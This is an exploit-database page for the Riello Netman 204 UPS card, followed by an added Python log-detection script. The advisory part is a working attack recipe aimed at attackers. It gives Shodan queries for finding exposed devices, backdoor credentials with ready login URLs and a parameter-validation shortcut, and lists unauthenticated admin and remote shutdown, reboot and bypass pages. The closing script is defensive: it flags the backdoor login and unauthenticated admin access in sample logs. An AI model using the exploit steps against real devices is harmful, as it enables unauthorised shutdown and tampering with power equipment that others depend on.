## https://sploitus.com/exploit?id=PACKETSTORM:190441
# Exploit Title: Netman 204 - Remote command without authentication
    # Date: 2/4/2025
    # Exploit Author: parsa rezaie khiabanloo
    # Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
    # Version: netman-204
    # Tested on: Windows/Linux
    
    Step 1 : An attacker can use the following search queries (dorks) to find exposed UPS panels.
    
    Shodan :   http.favicon.hash:22913038  OR  https://www.shodan.io/search?query=netman+204+cgi-bin
    
    # We found two panel variants: yellow and blue.
    
    Step 2 : On the yellow panel an attacker can log in with the username and password below, because the firmware contains a backdoor account. On the blue panel the remote-command pages can be reached without authentication, and Burp Suite Repeater can be used to view the details of the UPS.
    
    Yellow panel : username and password : eurek
    
    Example login requests for the yellow panel :
    
    http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
    or
    https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
    
    Due to flaws in parameter validation, the URL can be shortened to:
    
    http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
    or
    https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
    
    
    Blue panel : username and password : admin
    
    Critical pages that leak information without authentication :
    
    http://IP/administration-commands.html
    http://IP/administration.html
    http://IP/administration.html#
    http://IP/administration.html#LDAP
    http://IP/administration.html#active-users
    http://IP/administration.html#firmware-upgrade
    http://IP/configuration.html
    http://IP/history.html
    http://IP/index.html
    http://IP/login.html
    http://IP/system-overview.html
    http://IP/table.html
    
    # Using the paths above, the details of the UPS can be viewed without authentication.
    
    First open Burp Suite and intercept a request, then replace the path with one of the paths above, send the request to Repeater, send it again, and open the Render tab on the response to see the page.
    
    Remote command pages reachable without authentication :
    
    http://IP/administration-commands.html
    http://IP/administration-commands.html#
    http://IP/administration-commands.html#reboot-irms
    http://IP/administration-commands.html#reboot-mdu
    http://IP/administration-commands.html#reboot-xts
    http://IP/administration-commands.html#shutdown
    http://IP/administration-commands.html#shutdown-irms
    http://IP/administration-commands.html#shutdown-mdu
    http://IP/administration-commands.html#shutdown-restore
    http://IP/administration-commands.html#shutdown-restore-irms
    http://IP/administration-commands.html#shutdown-restore-mdu
    http://IP/administration-commands.html#shutdown-restore-xts
    http://IP/administration-commands.html#shutdown-xts
    http://IP/administration-commands.html#shutdownrestore
    http://IP/administration-commands.html#switch-irms
    http://IP/administration-commands.html#switch-on-bypass
    http://IP/administration-commands.html#test-battery
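The two access patterns described above (the hard-coded `eurek` login, including its collapsed `username=eurek%20eurek` form, and hits on the administration pages from clients that never logged in) can be picked out of web access logs. The script below is an added detection example, not part of the original advisory; it assumes combined-format logs from a reverse proxy or network sensor placed in front of the Netman 204 card, and the log lines in it are constructed samples.

```python
import re

# Constructed sample access log lines (combined log format, as a reverse proxy or
# sensor in front of the Netman 204 card would record them); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Feb/2025:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [04/Feb/2025:10:00:05 +0000] "GET /cgi-bin/login.cgi?username=eurek&password=eurek HTTP/1.1" 200 128
198.51.100.9 - - [04/Feb/2025:10:01:00 +0000] "GET /cgi-bin/login.cgi?username=eurek%20eurek HTTP/1.1" 200 128
192.0.2.44 - - [04/Feb/2025:10:02:30 +0000] "GET /administration-commands.html HTTP/1.1" 200 4096
10.0.0.5 - - [04/Feb/2025:10:03:00 +0000] "GET /cgi-bin/login.cgi?username=admin&password=admin HTTP/1.1" 200 128
10.0.0.5 - - [04/Feb/2025:10:03:10 +0000] "GET /administration.html HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Pages from the advisory that should never be served to an unauthenticated client.
ADMIN_PATHS = ("/administration-commands.html", "/administration.html")

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text):
    """Return a list of (client_ip, reason, request_target) findings, in log order."""
    findings = []
    logged_in = set()  # client IPs that issued a login.cgi request earlier in the log
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec:
            continue
        path, _, query = rec["target"].partition("?")
        if path == "/cgi-bin/login.cgi":
            # the hard-coded 'eurek' account, in the normal or the collapsed form
            if re.search(r"username=eurek(%20|&|$)", query):
                findings.append((rec["ip"], "backdoor-credential-login", rec["target"]))
            logged_in.add(rec["ip"])
        elif path in ADMIN_PATHS and rec["status"] == "200" and rec["ip"] not in logged_in:
            # an admin page served with 200 to a client that never hit the login page
            findings.append((rec["ip"], "admin-page-without-login", rec["target"]))
    return findings

if __name__ == "__main__":
    for ip, reason, target in detect(SAMPLE_LOG):
        print(f"{ip:15} {reason:26} {target}")
```

On the sample above it reports the two `eurek` logins and the unauthenticated hit on `administration-commands.html`, while the `admin` session that logged in first is not flagged.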